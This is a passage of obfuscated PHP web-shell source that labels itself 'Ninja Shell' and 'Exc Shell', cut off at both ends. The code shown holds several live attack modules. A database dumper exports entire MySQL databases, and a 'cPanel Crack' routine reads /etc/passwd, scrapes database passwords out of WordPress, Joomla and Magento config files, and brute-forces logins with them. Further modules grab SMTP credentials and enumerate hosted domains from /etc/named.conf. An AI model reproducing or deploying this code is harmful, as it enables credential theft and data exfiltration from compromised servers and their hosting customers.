40\104\x65\x70\x74\x68\40\x3a\x20\74\57\164\144\76\xa\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\x3c\x74\144\76\xa\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\40\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\x3c\151\x6e\x70\165\164\40\x74\x79\160\x65\75\x22\143\x68\145\x63\x6b\142\157\170\42\x20\x6e\x61\155\145\75\42\144\145\x70\x74\x68\133\135\42\40\x76\x61\x6c\165\x65\x3d\42\60\42\x20\x63\150\145\x63\x6b\x65\144\75\42\143\150\x65\143\x6b\x65\x64\42\x2f\76\x26\156\142\x73\x70\73\60\46\156\142\163\160\x3b\x26\x6e\x62\163\160\73\xa\40\x20\x20\40\x20\40\40\40\x20\40\40\40\40\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\x20\x20\x20\74\151\156\160\x75\x74\x20\164\x79\160\x65\x3d\x22\x63\150\145\143\x6b\x62\x6f\x78\42\x20\x6e\x61\x6d\x65\x3d\x22\144\x65\x70\164\x68\133\x5d\x22\40\x76\x61\154\x75\145\75\42\x31\42\57\x3e\46\x6e\x62\163\x70\x3b\x31\46\x6e\142\163\160\73\x26\156\142\x73\x70\73\xa\x20\x20\x20\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\40\40\40\x20\74\x69\x6e\x70\x75\164\x20\164\171\x70\145\x3d\x22\143\x68\x65\x63\x6b\x62\157\170\42\x20\x6e\x61\x6d\x65\75\x22\144\x65\160\164\x68\133\135\42\x20\166\141\154\165\x65\x3d\x22\x32\42\x2f\x3e\x26\156\x62\x73\x70\73\62\46\156\142\163\160\x3b\46\x6e\142\163\160\x3b\12\40\40\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\40\40\x20\40\74\151\x6e\160\x75\x74\x20\x74\171\160\x65\75\42\143\x68\x65\143\153\142\157\x78\x22\x20\x6e\x61\x6d\145\x3d\x22\144\x65\x70\164\x68\133\x5d\x22\40\x76\x61\154\x75\145\x3d\x22\x33\x22\57\76\46\156\142\163\160\73\x33\12\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\40\40\x20\40\40\40\74\x2f\x74\x64\x3e\12\40\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x3c\57\164\x72\76\x20\40\40\x20\x20\40\40\40\xa\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\74\x74\x72\76\12\40\x20\40\x20\40\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\40\40\40\x20\40\x20\x3c\164\x64\x20\143\157\x6c\163\x70\x61\156\75\x22\62\x22\76\74\164\145\170\164\141\162\x65\x61\40\143\154\x61\163\x73\x20\75\40\42\146\157\162\155\x2d\x63\157\156\x74\x72\x6f\x6c\x22\x20\x6e\141\x6d\145\x3d\x22\x63\x6f\x64\145\42\x20\x73\x74\171\154\145\x3d\40\x22\x77\x69\144\164\150\x3a\x31\60\x30\x25\x22\x3e\x3c\x2f\x74\145\170\164\x61\x72\x65\x61\x3e\74\x2f\164\x64\76\xa\40\x20\40\40\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\40\40\x20\40\x3c\57\x74\162\x3e\40\40\40\x20\40\40\40\40\40\x20\40\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\12\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\40\74\x74\x72\x3e\xa\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\40\40\40\40\x20\40\40\x20\40\x20\40\x20\x20\74\x74\x64\x20\x63\157\x6c\163\160\141\x6e\75\x22\62\x22\x20\x73\164\x79\154\145\75\42\164\145\170\x74\55\x61\154\151\147\x6e\72\x20\x63\145\x6e\x74\145\162\73\42\76\12\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\40\x3c\x69\x6e\x70\165\164\x20\x74\171\160\145\x3d\42\x68\x69\x64\144\x65\156\x22\40\x6e\x61\x6d\x65\x3d\x22\141\42\40\166\x61\154\x75\x65\75\42\111\156\152\145\x63\164\157\162\x22\x3e\xa\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\x3c\x69\x6e\160\x75\x74\x20\x74\x79\160\145\x3d\x22\150\151\144\x64\x65\156\x22\x20\156\141\x6d\x65\x3d\42\x63\42\x20\x76\141\154\165\x65\75\x22" . htmlspecialchars($GLOBALS["\143\167\x64"]) . "\42\76\xa\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\40\40\40\40\40\40\40\x20\40\74\x69\156\160\165\x74\x20\x74\x79\x70\x65\x3d\42\150\x69\x64\x64\x65\x6e\42\x20\156\141\x6d\145\75\x22\160\61\x22\x3e\12\40\40\x20\x20\40\40\40\x20\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x3c\x69\156\160\x75\164\x20\164\x79\160\x65\75\42\x68\151\x64\x64\x65\156\42\40\156\141\x6d\x65\x3d\42\x70\62\x22\76\xa\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x3c\x69\x6e\x70\x75\x74\x20\164\x79\160\145\x3d\x22\x68\151\144\x64\x65\x6e\x22\x20\x6e\141\155\145\75\42\x63\x68\x61\162\163\x65\164\42\x20\166\x61\154\x75\145\x3d\42" . (isset($_POST["\x63\150\141\162\x73\145\x74"]) ? $_POST["\143\x68\141\x72\x73\145\164"] : '') . "\42\x3e\xa\x20\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\74\151\156\x70\x75\x74\40\x63\154\x61\163\163\40\x3d\40\42\146\157\x72\155\x2d\x63\157\156\x74\162\x6f\154\42\x20\x73\164\x79\154\145\75\x22\160\141\144\x64\151\x6e\x67\40\72\x35\160\170\73\x20\167\151\144\164\x68\72\x31\x30\60\x70\170\x3b\x22\40\x6e\141\155\145\75\x22\x73\165\x62\155\151\x74\42\40\x74\171\160\x65\75\x22\x73\165\142\x6d\x69\164\42\x20\x76\x61\154\165\145\x3d\42\x49\x6e\x6a\x65\143\164\42\x2f\x3e\x3c\x2f\x74\x64\x3e\12\40\40\40\40\40\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\74\142\162\76\74\x2f\164\162\x3e\12\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x3c\57\164\141\x62\154\x65\76\xa\x20\40\x20\x20\40\x20\x20\40\74\x2f\146\x6f\x72\155\76"; } echo "\74\150\162\76\74\142\162\76"; } elseif (isset($_GET[hex("\144\142\x2d\x64\x75\x6d\160")])) { echo "\12\74\x63\145\x6e\x74\x65\162\x3e\x3c\x68\162\x3e\74\x62\x72\x3e\xa\x3c\146\157\162\x6d\x20\141\143\164\x69\157\x6e\40\x6d\x65\x74\x68\157\144\x3d\x70\157\x73\x74\x3e\xa\x3c\x74\x61\x62\x6c\x65\40\x77\151\144\164\x68\x3d\x33\x37\61\x20\143\x6c\x61\163\163\x3d\x74\x61\x62\156\145\164\40\x3e\12\74\x68\x32\76\104\141\x74\x61\142\x61\x73\145\x20\104\x75\155\x70\145\x72\x20\116\151\156\152\x61\40\x53\150\x65\154\154\74\57\150\62\76\12\74\x74\x72\x3e\xa\x9\x3c\164\144\76\123\145\x72\166\145\162\40\x3c\x2f\164\x64\x3e\xa\x9\74\164\144\x3e\x3c\151\x6e\x70\x75\164\x20\x63\154\x61\x73\x73\75\42\x66\x6f\162\x6d\55\x63\157\156\x74\162\x6f\154\42\x20\164\171\x70\145\x3d\164\145\x78\164\40\x6e\141\x6d\x65\75\163\x65\x72\166\x65\x72\x20\163\x69\172\145\x3d\65\x32\x20\141\x75\164\157\143\x6f\x6d\x70\154\x65\x74\x65\x20\x3d\40\42\157\146\x66\x22\x3e\x3c\57\164\x64\x3e\x3c\x2f\x74\162\x3e\x3c\x74\x72\x3e\12\x9\74\164\x64\76\x55\163\145\162\x6e\x61\x6d\145\74\x2f\164\144\x3e\xa\11\74\164\x64\x3e\x3c\x69\x6e\160\x75\164\40\x63\x6c\x61\x73\163\75\42\146\x6f\x72\155\55\x63\157\156\x74\162\157\154\42\x20\x74\x79\160\x65\x3d\164\145\x78\164\x20\x6e\x61\155\145\x3d\165\163\145\162\x6e\x61\x6d\145\x20\x73\x69\x7a\145\x3d\x35\x32\x20\141\x75\164\x6f\x63\x6f\x6d\x70\x6c\145\164\145\40\x3d\40\42\x6f\x66\146\x22\76\74\x2f\164\x64\76\74\x2f\164\162\76\74\164\x72\x3e\xa\x9\x3c\x74\x64\76\120\x61\163\163\167\157\x72\144\x3c\57\164\x64\x3e\12\11\x3c\164\x64\76\74\x69\x6e\x70\165\164\40\x63\154\x61\x73\x73\x3d\x22\146\157\162\x6d\55\143\157\x6e\164\x72\x6f\x6c\42\40\x74\171\160\x65\x3d\x74\x65\x78\x74\40\156\x61\155\x65\x3d\160\141\x73\x73\x77\157\x72\144\x20\163\x69\172\x65\75\x35\62\40\141\x75\164\157\143\x6f\x6d\x70\154\x65\x74\145\x20\x3d\x20\42\157\146\146\42\x3e\74\57\x74\x64\x3e\74\57\164\162\76\x3c\x74\x72\x3e\xa\11\74\164\144\x3e\104\141\164\x61\x42\x61\x73\x65\40\x4e\x61\x6d\x65\74\57\x74\144\76\12\11\x3c\x74\x64\x3e\x3c\151\x6e\x70\x75\164\x20\x63\x6c\141\163\x73\x3d\42\146\x6f\x72\x6d\55\143\x6f\156\164\162\x6f\x6c\42\40\164\171\x70\145\x3d\164\x65\170\164\x20\156\x61\155\145\x3d\x64\142\x6e\141\155\145\x20\x73\151\172\x65\75\x35\62\x20\141\165\x74\x6f\x63\157\x6d\160\154\x65\164\145\x20\x3d\40\42\157\x66\146\42\76\74\57\164\x64\x3e\74\x2f\x74\162\x3e\12\x9\74\x74\162\x3e\xa\x9\x3c\164\144\76\x44\102\40\124\171\160\x65\x20\x3c\57\x74\144\x3e\xa\11\x3c\x74\x64\76\x3c\146\157\x72\x6d\x20\x6d\x65\x74\150\x6f\x64\75\160\157\x73\x74\x20\141\x63\164\151\x6f\x6e\x3d\x22" . $me . "\42\76\xa\x9\74\163\145\154\x65\x63\x74\x20\143\x6c\141\x73\x73\x3d\x22\146\x6f\162\155\55\x63\x6f\x6e\x74\162\x6f\154\x22\40\x6e\141\x6d\x65\x3d\x6d\x65\164\x68\x6f\x64\x3e\12\11\x9\74\x6f\x70\x74\x69\x6f\x6e\40\40\166\141\x6c\x75\145\x3d\42\x67\x7a\x69\x70\42\76\x47\172\x69\160\x3c\57\157\160\x74\x69\x6f\x6e\76\12\x9\11\74\x6f\160\x74\x69\157\156\40\x76\141\x6c\165\145\75\x22\163\x71\x6c\42\76\123\x71\x6c\x3c\x2f\x6f\160\164\151\157\156\x3e\12\11\11\x3c\x2f\163\x65\154\x65\143\164\76\12\x9\x9\x3c\x62\162\76\12\x9\74\x69\156\x70\x75\164\x20\143\154\x61\163\163\75\x22\x66\x6f\x72\x6d\55\x63\x6f\x6e\x74\162\157\154\42\40\164\x79\160\145\75\163\165\x62\155\x69\164\x20\x76\141\154\x75\145\x3d\x22\x20\40\104\x75\x6d\x70\x21\x20\x20\42\x20\76\74\x2f\164\x64\x3e\x3c\57\x74\x72\76\12\x9\x3c\57\146\157\162\155\76\74\57\143\x65\x6e\x74\145\162\x3e\x3c\x2f\x74\141\x62\154\145\x3e\74\57\x64\151\x76\x3e\x3c\x68\162\x3e\x3c\142\x72\76"; if ($_POST["\x75\163\145\162\x6e\141\x6d\x65"] && $_POST["\144\142\156\x61\x6d\145"] && $_POST["\x6d\x65\164\150\157\144"]) { $date = date("\x59\55\x6d\55\x64"); $dbserver = $_POST["\x73\145\x72\x76\145\x72"]; $dbuser = $_POST["\x75\163\x65\x72\x6e\x61\155\145"]; $dbpass = $_POST["\x70\x61\163\163\167\157\162\144"]; $dbname = $_POST["\x64\x62\x6e\x61\155\x65"]; $file = "\104\165\155\x70\x2d{$dbname}\55{$date}"; $method = $_POST["\x6d\145\x74\150\157\144"]; if ($method == "\163\161\154") { $file = "\x44\165\x6d\x70\55{$dbname}\55{$date}\56\x73\161\x6c"; $fp = fopen($file, "\167"); } else { $file = "\x44\165\x6d\160\55{$dbname}\x2d{$date}\56\163\161\x6c\x2e\147\x7a"; $fp = gzopen($file, "\x77"); } function write($data) { global $fp; if ($_POST["\155\145\164\x68\x6f\144"] == "\x73\163\161\154") { fwrite($fp, $data); } else { gzwrite($fp, $data); } } mysql_connect($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query("\x53\110\x4f\127\x20\x54\x41\102\x4c\x45\x53"); while ($i = mysql_fetch_array($tables)) { $i = $i["\x54\x61\142\154\145\163\x5f\151\156\137" . $dbname]; $create = mysql_fetch_array(mysql_query("\123\110\117\x57\x20\x43\x52\x45\101\124\x45\40\124\101\102\114\x45\40" . $i)); write($create["\x43\162\145\141\164\145\40\x54\141\142\x6c\x65"] . "\73\156\x6e"); $sql = mysql_query("\x53\x45\x4c\105\103\124\x20\52\40\x46\x52\x4f\x4d\x20" . $i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "\x27" . mysql_escape_string($k) . "\x27"; } write("\x49\116\x53\105\122\x54\40\x49\116\x54\117\40{$i}\x20\x56\x41\x4c\125\x45\123\50" . implode("\x2c", $row) . "\51\x3b\156"); } } } if ($method == "\163\163\161\154") { fclose($fp); } else { gzclose($fp); } header("\x43\157\156\164\145\156\x74\55\x44\151\x73\160\157\x73\x69\164\151\x6f\156\72\x20\141\164\x74\141\x63\150\x6d\x65\156\164\x3b\x20\146\x69\x6c\x65\156\141\x6d\145\75" . $file); header("\103\x6f\x6e\x74\145\156\x74\x2d\x54\x79\160\x65\72\40\x61\x70\160\154\151\143\141\164\151\157\156\57\144\x6f\x77\x6e\154\157\141\144"); header("\103\x6f\x6e\x74\145\x6e\164\x2d\x4c\145\x6e\x67\x74\x68\72\x20" . filesize($file)); flush(); $fp = fopen($file, "\162"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } elseif (isset($_GET[hex("\143\160\x2d\x63\x72\141\143\x6b")])) { if ($_POST["\143\162\141\143\x6b"]) { $usercp = explode("\xd\xa", $_POST["\x75\163\145\162\x5f\x63\160"]); $passcp = explode("\15\xa", $_POST["\x70\141\x73\x73\x5f\143\160"]); $i = 0; foreach ($usercp as $ucp) { foreach ($passcp as $pcp) { if (@mysql_connect("\x6c\x6f\143\x61\x6c\x68\157\x73\x74", $ucp, $pcp)) { if ($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "\61"; $_SESSION[$pcp] = "\61"; if ($ucp == '' || $pcp == '') { } else { $i++; if (function_exists("\160\x6f\163\x69\x78\137\147\x65\x74\160\167\165\151\x64")) { $domain_cp = file_get_contents("\x2f\x65\164\x63\57\x6e\x61\x6d\x65\144\56\143\x6f\156\146"); if ($domain_cp == '') { $dom = "\74\146\x6f\156\x74\x20\x63\157\154\x6f\x72\x3d\162\x65\144\x3e\x67\141\x62\151\163\x61\40\141\155\142\151\x6c\x20\x6e\x61\x6d\141\40\x64\x6f\155\141\x69\x6e\x20\x6e\x79\141\74\57\x66\x6f\156\x74\x3e"; } else { preg_match_all("\43\57\x76\141\162\x2f\156\141\x6d\145\x64\x2f\x28\56\52\77\51\x2e\144\x62\x23", $domain_cp, $domains_cp); foreach ($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("\57\145\164\x63\x2f\x76\x61\154\x69\141\x73\x65\163\x2f{$dj}")); $user_cp_url = $user_cp_url["\156\x61\155\x65"]; if ($user_cp_url == $ucp) { $dom = "\x3c\141\40\x68\162\145\x66\x3d\x27\x68\x74\x74\160\x3a\57\x2f{$dj}\57\x27\40\164\x61\162\147\x65\164\75\x27\x5f\142\x6c\141\156\153\x27\x3e\x3c\x66\x6f\x6e\x74\40\x63\157\x6c\x6f\x72\x3d\x6c\151\x6d\x65\x3e{$dj}\74\x2f\x66\x6f\156\x74\x3e\x3c\x2f\141\x3e"; break; } } } } else { $dom = "\x3c\146\157\x6e\x74\x20\x63\157\x6c\x6f\162\75\162\145\x64\76\146\165\156\143\164\x69\157\156\40\x69\x73\x20\104\151\x73\141\142\x6c\145\40\142\x79\40\163\171\x73\164\145\155\x3c\x2f\x66\x6f\x6e\x74\76"; } echo "\165\163\x65\x72\x6e\x61\x6d\x65\40\x28\x3c\x66\157\156\164\40\143\x6f\154\157\x72\x3d\154\x69\x6d\145\76{$ucp}\x3c\x2f\146\x6f\x6e\164\x3e\x29\x20\160\141\163\x73\167\x6f\162\x64\x20\50\x3c\146\157\x6e\x74\40\143\x6f\x6c\x6f\162\x3d\154\151\155\145\76{$pcp}\x3c\57\146\x6f\156\164\x3e\x29\x20\x64\157\x6d\x61\x69\x6e\40\50{$dom}\51\x3c\142\162\x3e"; } } } } } if ($i == 0) { } else { echo "\x3c\x62\x72\x3e\163\x75\153\163\x65\x73\40\156\171\157\x6c\157\x6e\x67\40" . $i . "\40\x43\160\141\156\x65\x6c\x20\x62\x79\40\74\x66\157\156\x74\x20\x63\x6f\x6c\157\x72\x3d\154\151\x6d\x65\76\x45\x78\143\x20\x53\150\x65\154\x6c\56\x3c\x2f\x66\x6f\x6e\x74\x3e"; } } else { echo "\74\x63\x65\x6e\164\145\162\x3e\x3c\150\162\76\x3c\142\162\76\xa\x9\11\74\146\157\162\x6d\40\155\145\164\150\157\x64\75\47\x70\157\163\164\x27\76\xa\x9\x9\x3c\150\62\76\x43\160\141\x6e\x65\154\40\103\x72\x61\143\x6b\40\x4e\151\156\x6a\x61\40\x53\x68\145\x6c\154\74\x2f\x68\x32\76\12\x9\x9\x55\123\x45\122\x3a\x20\x3c\x62\162\x3e\xa\x9\11\x3c\164\145\170\x74\141\162\x65\x61\x20\x63\154\141\163\x73\40\x3d\40\x27\x66\157\162\x6d\55\143\157\156\164\x72\157\154\47\40\163\164\x79\154\145\75\47\167\x69\x64\x74\150\x3a\40\x34\x35\x30\160\x78\73\40\x68\145\x69\x67\150\x74\x3a\40\61\65\60\x70\170\x3b\x27\40\156\141\x6d\145\75\47\165\x73\145\x72\137\x63\160\47\76"; $_usercp = fopen("\57\x65\164\x63\57\x70\x61\x73\163\x77\144", "\162"); while ($getu = fgets($_usercp)) { if ($getu == '' || !$_usercp) { echo "\x3c\x66\x6f\x6e\164\x20\143\x6f\x6c\x6f\x72\x3d\162\145\x64\x3e\x43\x61\156\47\x74\40\162\145\141\144\40\57\145\x74\x63\57\x70\x61\x73\x73\167\x64\74\x2f\146\157\x6e\164\x3e"; } else { preg_match_all("\x2f\50\x2e\52\x3f\51\x3a\x78\x3a\x2f", $getu, $u); foreach ($u[1] as $user_cp) { if (is_dir("\x2f\x68\x6f\155\145\x2f{$user_cp}\x2f\160\x75\142\154\x69\143\x5f\150\164\x6d\x6c")) { echo "{$user_cp}\12"; } } } } echo "\74\57\164\x65\170\164\141\162\145\141\x3e\74\142\162\76\xa\x9\11\x50\x41\123\x53\x3a\x20\74\x62\162\x3e\xa\x9\x9\x3c\164\145\170\x74\x61\162\145\141\40\143\x6c\x61\x73\x73\75\40\x27\146\x6f\162\155\x2d\x63\157\x6e\164\x72\157\x6c\47\x20\163\164\x79\154\145\75\x27\167\x69\x64\x74\x68\x3a\40\64\x35\60\x70\x78\x3b\x20\x68\x65\x69\x67\x68\x74\72\x20\x32\60\x30\x70\170\x3b\47\x20\x6e\x61\155\145\75\x27\160\141\x73\x73\137\143\x70\47\x3e"; function cp_pass($dir) { $pass = ''; $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}\x2f{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}\57{$dirb}"); if (preg_match("\57\x57\157\162\144\120\x72\x65\x73\x73\57", $ambil)) { $pass .= ambilkata($ambil, "\x44\102\x5f\x50\101\x53\123\x57\117\122\104\x27\x2c\40\47", "\47") . "\xa"; } elseif (preg_match("\57\x4a\x43\x6f\x6e\x66\x69\147\174\152\x6f\x6f\x6d\x6c\141\57", $ambil)) { $pass .= ambilkata($ambil, "\x70\141\x73\163\x77\157\x72\144\40\x3d\x20\47", "\x27") . "\xa"; } elseif (preg_match("\x2f\x4d\141\x67\145\156\164\157\174\x4d\141\147\145\x5f\x43\157\162\x65\57", $ambil)) { $pass .= ambilkata($ambil, "\74\x70\141\163\x73\167\157\x72\x64\x3e\74\x21\x5b\x43\x44\x41\x54\x41\x5b", "\x5d\x5d\76\74\57\160\x61\163\163\167\157\x72\x64\x3e") . "\xa"; } elseif (preg_match("\57\160\x61\x6e\147\x67\151\154\x20\146\x75\x6e\x67\163\x69\x20\x76\141\x6c\151\x64\141\163\151\40\x78\163\163\40\144\141\156\x20\x69\x6e\152\x65\x63\164\x69\157\x6e\57", $ambil)) { $pass .= ambilkata($ambil, "\160\x61\x73\163\167\157\x72\x64\40\75\40\x22", "\x22") . "\xa"; } elseif (preg_match("\x2f\110\124\124\120\137\x53\x45\x52\126\105\x52\174\x48\x54\124\x50\x5f\103\x41\x54\x41\114\117\x47\174\x44\111\122\x5f\x43\x4f\116\106\x49\107\x7c\x44\111\x52\137\x53\131\123\x54\x45\x4d\x2f", $ambil)) { $pass .= ambilkata($ambil, "\x27\x44\102\137\120\x41\x53\123\x57\x4f\x52\104\47\54\40\x27", "\47") . "\xa"; } elseif (preg_match("\57\x63\154\x69\145\156\164\x2f", $ambil)) { preg_match("\x2f\x70\141\x73\x73\167\x6f\x72\144\75\x28\x2e\x2a\x29\57", $ambil, $pass1); $pass .= $pass1[1] . "\xa"; if (preg_match("\x2f\42\x2f", $pass1[1])) { $pass1[1] = str_replace("\x22", '', $pass1[1]); $pass .= $pass1[1] . "\12"; } } elseif (preg_match("\x2f\143\x63\x5f\x65\156\143\162\171\x70\x74\151\x6f\x6e\x5f\x68\141\163\x68\x2f", $ambil)) { $pass .= ambilkata($ambil, "\x64\142\x5f\x70\141\163\163\x77\x6f\x72\144\40\75\x20\47", "\47") . "\xa"; } } echo $pass; } $cp_pass = cp_pass($dir); echo $cp_pass; echo "\74\x2f\164\x65\x78\x74\141\162\145\141\76\74\142\162\x3e\xa\x9\x9\x3c\151\x6e\x70\x75\x74\40\x63\154\x61\x73\163\40\x3d\40\x27\146\157\162\155\55\143\x6f\x6e\x74\x72\157\154\47\x20\x74\171\160\x65\75\x27\163\x75\142\155\x69\x74\x27\40\x6e\x61\155\145\x3d\x27\143\162\141\x63\x6b\47\40\163\164\x79\x6c\x65\75\x27\x77\151\144\x74\150\x3a\x20\x34\65\x30\x70\170\x3b\x27\x20\x76\141\x6c\x75\145\x3d\x27\103\162\141\x63\153\x27\x3e\xa\x9\11\74\x2f\x66\x6f\x72\x6d\x3e\74\142\x72\x3e\xa\11\x9\74\163\160\x61\156\76\116\102\x3a\x20\x43\120\141\x6e\x65\154\40\x43\162\x61\143\x6b\40\x69\x6e\151\40\163\165\144\141\150\40\x61\165\164\x6f\x20\147\x65\x74\x20\160\x61\x73\163\167\157\x72\x64\40\50\x20\160\141\x6b\x65\x20\x64\142\x20\x70\x61\163\x73\x77\x6f\162\144\x20\x29\x20\x6d\x61\153\141\40\141\153\141\156\x20\167\157\x72\x6b\x20\x6a\x69\153\141\x20\x64\x69\x6a\141\154\x61\156\153\x61\156\x20\x64\x69\x20\x64\141\x6c\141\x6d\x20\x66\157\x6c\144\145\162\40\74\x75\76\x63\157\x6e\x66\x69\x67\74\57\165\x3e\40\x28\x20\x65\x78\72\x20\57\x68\157\x6d\145\x2f\x75\x73\145\162\x2f\x70\x75\x62\154\x69\x63\x5f\150\164\155\x6c\57\x6e\x61\155\x61\137\x66\157\154\x64\x65\x72\x5f\x63\x6f\156\x66\151\x67\x20\x29\x3c\x2f\x73\x70\x61\156\x3e\74\142\162\x3e\74\x2f\x63\145\x6e\x74\145\x72\x3e\x3c\x68\x72\x3e\74\142\162\76"; } } elseif (isset($_GET[hex("\163\x6d\x74\160\55\x67\162\141\x62")])) { $dir = path(); echo "\74\143\145\156\x74\x65\x72\76\x3c\163\x70\141\156\x3e\x4e\x42\72\x20\x54\x6f\x6f\154\163\x20\151\x6e\x69\x20\x77\x6f\x72\x6b\40\152\151\153\141\x20\x64\151\x6a\x61\154\141\156\153\x61\x6e\40\144\151\x20\x64\141\154\141\x6d\x20\146\x6f\154\144\145\x72\x20\x3c\165\x3e\143\x6f\x6e\x66\x69\147\x3c\57\x75\x3e\40\x28\x20\x65\x78\x3a\x20\x2f\x68\x6f\155\x65\57\x75\163\145\162\x2f\x70\x75\142\154\x69\143\137\x68\164\x6d\154\57\156\x61\155\141\137\x66\157\154\144\145\x72\x5f\143\157\x6e\x66\151\x67\40\51\74\x2f\x73\160\x61\156\x3e\74\57\x63\145\156\x74\x65\162\x3e\x3c\142\x72\76"; function scj($dir) { $dira = scandir($dir); foreach ($dira as $dirb) { if (!is_file("{$dir}\57{$dirb}")) { continue; } $ambil = file_get_contents("{$dir}\57{$dirb}"); $ambil = str_replace("\x24", '', $ambil); if (preg_match("\x2f\x4a\x43\157\156\146\x69\x67\174\x6a\x6f\x6f\x6d\x6c\x61\x2f", $ambil)) { $smtp_host = ambilkata($ambil, "\163\x6d\164\x70\150\157\163\x74\40\75\40\47", "\47"); $smtp_auth = ambilkata($ambil, "\x73\155\x74\160\x61\165\164\150\40\75\40\47", "\47"); $smtp_user = ambilkata($ambil, "\163\x6d\x74\160\x75\x73\145\x72\x20\75\40\47", "\x27"); $smtp_pass = ambilkata($ambil, "\163\x6d\x74\x70\160\x61\x73\163\40\x3d\x20\x27", "\47"); $smtp_port = ambilkata($ambil, "\x73\x6d\x74\x70\x70\157\162\x74\40\x3d\x20\47", "\47"); $smtp_secure = ambilkata($ambil, "\163\x6d\164\x70\163\x65\143\x75\x72\x65\x20\75\x20\x27", "\x27"); echo "\74\x63\x65\x6e\x74\145\x72\76"; echo "\123\x4d\124\120\x20\110\x6f\x73\164\72\40\74\146\x6f\x6e\x74\x20\x63\157\154\157\162\75\154\x69\155\145\x3e{$smtp_host}\x3c\x2f\x66\157\x6e\164\x3e\x3c\x62\162\x3e"; echo "\x53\115\124\120\x20\160\x6f\x72\x74\x3a\40\x3c\x66\x6f\156\164\40\143\x6f\154\157\x72\x3d\x6c\151\x6d\145\76{$smtp_port}\x3c\x2f\146\x6f\x6e\164\x3e\x3c\x62\x72\x3e"; echo "\123\115\x54\x50\40\165\163\145\x72\x3a\x20\x3c\x66\x6f\156\164\40\143\x6f\154\157\162\75\154\151\x6d\x65\x3e{$smtp_user}\74\x2f\x66\157\156\x74\x3e\x3c\x62\x72\76"; echo "\123\x4d\x54\120\x20\160\x61\163\163\x3a\40\74\x66\157\x6e\164\x20\143\x6f\154\157\x72\x3d\x6c\151\155\x65\x3e{$smtp_pass}\74\57\x66\157\x6e\164\76\74\142\162\x3e"; echo "\x53\x4d\x54\120\x20\x61\165\x74\x68\x3a\x20\74\146\157\156\164\40\x63\157\x6c\x6f\x72\x3d\154\151\155\x65\x3e{$smtp_auth}\74\x2f\146\157\156\164\76\x3c\x62\x72\76"; echo "\x53\115\x54\x50\x20\163\x65\x63\x75\162\x65\72\40\74\x66\x6f\x6e\164\40\143\157\x6c\x6f\162\x3d\154\x69\155\x65\x3e{$smtp_secure}\x3c\57\x66\157\x6e\x74\x3e\x3c\142\x72\x3e\x3c\142\x72\x3e"; echo "\x3c\57\143\x65\156\164\145\162\76"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif (isset($_GET[hex("\144\x6f\155\141\151\x6e\x73")])) { echo "\74\x63\x65\156\x74\145\x72\76\xa\11\x9\74\x64\x69\x76\x20\143\x6c\141\163\163\x3d\x27\x6d\x79\x62\157\x78\47\x3e\xa\11\11\74\160\40\141\154\151\x67\x6e\x3d\x27\143\x65\156\x74\145\x72\47\x20\x63\x6c\141\163\x73\75\x27\143\x67\170\x32\x27\x3e\x44\157\x6d\x61\151\x6e\163\40\x61\x6e\144\x20\125\163\x65\x72\x73\x3c\x2f\x70\x3e"; $d0mains = @file("\57\145\x74\x63\57\156\x61\x6d\x65\144\56\x63\157\156\146"); if (!$d0mains) { die("\74\x63\x65\x6e\164\145\162\76\105\162\x72\x6f\x72\40\x3a\40\x63\x61\x6e\x27\164\x20\162\x65\x61\x64\x20\133\40\x2f\145\164\x63\x2f\x6e\141\155\x65\x64\x2e\x63\157\x6e\146\x20\135\x3c\57\143\x65\156\164\145\x72\x3e"); } echo "\x3c\164\141\x62\x6c\145\x20\x69\144\75\x22\157\165\164\x70\x75\164\42\x3e\x3c\x74\x72\40\x62\147\143\x6f\154\x6f\x72\75\43\143\145\x63\x65\x63\145\x3e\x3c\x74\x64\x3e\104\x6f\155\x61\x69\x6e\163\x3c\57\x74\x64\x3e\74\x74\x64\76\165\163\145\x72\x73\x3c\x2f\x74\144\x3e\74\x2f\x74\x72\76"; foreach ($d0mains as $d0main) { if (eregi("\172\157\x6e\145", $d0main)) { preg_match_all("\43\x7a\157\x6e\x65\x20\x22\x28\x2e\x2a\51\x22\x23", $d0main, $domains); flush(); if 